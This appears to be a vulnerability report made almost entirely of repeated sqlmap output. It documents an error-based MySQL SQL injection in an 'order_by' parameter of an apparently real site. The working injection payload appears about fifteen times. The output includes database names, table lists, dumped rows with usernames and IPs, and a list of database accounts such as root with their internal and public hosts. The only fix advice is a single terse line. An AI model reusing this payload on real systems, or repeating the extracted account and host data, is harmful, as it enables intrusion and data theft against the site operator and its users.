Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

current user is DBA: 'True'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: apphistory_news
[5 tables]
+-------------+
| figure |
| hot_tag |
| relate_news |
| relate_pic|
| stats |
+-------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: app_weather
[5 tables]
+-------------+
| abroad |
| airport |
| internal |
| nephogram |
| relate_news |
+-------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: app_news
[23 tables]
+-----------------------------+
| hash |
| hdphoto |
| ip_test |
| lianghui_2010 |
| lianghui_2010_copy_20100226 |
| lianghui_2010_lhyl |
| lianghui_2012 |
| lianghui_2012_lhyl |
| special_diqiuyixiaoshi2010|
| special_martyr |
| special_qinghaiyushudizhen|
| special_xinanhanzai |
| timeline |
| tw_vote |
| upload |
| upload_20121116 |
| upload_v |
| user_test |
| vote_category |
| vote_detail |
| weather_yb |
| weather_yb_tomorrow |
| weather_zh |
+-----------------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: app_news
Table: user_test
[2 entries]
+----+--------------+------+---------+-------------+---------------------+
| id | ip | lock | intro | username | rec_time |
+----+--------------+------+---------+-------------+---------------------+
| 1| 220.181.24.2 | | | wangyun1127 | 2010-05-10 14:27:06 |
| 2| 220.181.24.2 | | c100 | c100 | 0000-00-00 00:00:00 |
+----+--------------+------+---------+-------------+---------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: app_news
Table: hash
[10 entries]
+----+--------------+--------+
| id | name | value|
+----+--------------+--------+
| 1| ygdx_gd | 258 |
| 2| ygdx_bsd | 306 |
| 3| ygdx_zmd | 57 |
| 4| ygdx_time | 5月8日 |
| 5| wudu2010_hlb | 198864 |
| 6| wudu2010_szc | 150782 |
| 7| wudu2010_wyc | 0 |
| 8| wudu2010_xsh | 0 |
| 9| wudu2010_wwm | 0 |
| 10 | wudu2010_zll | 358715 |
+----+--------------+--------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

Database: app_news
Table: lianghui_2012
[10 entries]
+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+
| id | type | title | verify | delete | cai_num | content | ding_num | user_name | user_type | click_num | debate_num | submit_time |
+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+
| 1| 1 | 1 | 1 | | 2 | 1 | 3 | kuaibo_10501 | 1 | 7 | 0 | 2012-02-28 17:44:30 |
| 2| 1 | 11 | 1 | | 0 | 1 | 1 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:47 |
| 3| 1 | 2 | 1 | | 0 | 2 | 1 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:54 |
| 4| 1 | 3 | 1 | | 0 | 3 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:46:59 |
| 5| 1 | 4 | 1 | | 0 | 4 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:47:05 |
| 6| 1 | 5 | 1 | | 1 | 5 | 0 | kuaibo_10501 | 1 | 0 | 0 | 2012-02-29 15:47:09 |
| 7| 1 | 5 | 1 | | 1 | 5 | 20 | kuaibo_10501 | 1 | 97 | 0 | 2012-02-29 15:47:17 |
| 8| 1 | 6 | 1 | | 0 | 6 | 5 | kuaibo_10501 | 1 | 107 | 0 | 2012-02-29 15:47:22 |
| 9| 1 | 7 | 1 | | 0 | 7 | 91 | kuaibo_10501 | 1 | 235 | 0 | 2012-02-29 15:47:26 |
| 10 | 1 | 8 | 1 | | 2 | 8 | 2 | kuaibo_10501 | 1 | 97 | 0 | 2012-02-29 15:47:31 |
+----+------+-------+--------+--------+---------+---------+----------+--------------+-----------+-----------+------------+---------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

available databases [11]:
[*] app_bbs
[*] app_news
[*] app_weather
[*] apphistory_news
[*] appmil_news
[*] appsports_news
[*] baike_health
[*] baike_house
[*] information_schema
[*] mysql
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

current user is DBA: 'True'

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: order_by
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined
---

database management system users [234]:
[*] ''@'localhost'
[*] 'B74wNuTbbx'@'10.11.2.89'
[*] 'B74wNuTbbx'@'10.11.2.90'
[*] 'B74wNuTbbx'@'10.13.2.134'
[*] 'B74wNuTbbx'@'10.13.2.135'
[*] 'B74wNuTbbx'@'10.13.2.176'
[*] 'B74wNuTbbx'@'10.13.2.177'
[*] 'B74wNuTbbx'@'220.181.67.192'
[*] 'iadmin'@'211.151.61.77'
[*] 'root'@'10.13.2.132'
[*] 'root'@'10.13.2.134'
[*] 'root'@'10.13.2.135'
[*] 'root'@'10.13.2.176'
[*] 'root'@'10.13.2.177'
[*] 'root'@'127.0.0.1'
[*] 'root'@'192.168.2.162'
[*] 'root'@'192.168.2.167'
[*] 'root'@'220.181.24.100'
[*] 'root'@'220.181.24.166'
[*] 'root'@'220.181.24.2'
[*] 'root'@'220.181.67.192'
[*] 'root'@'localhost'
[*] 'zabbix'@'127.0.0.1'

修复方案:

还是防注入吧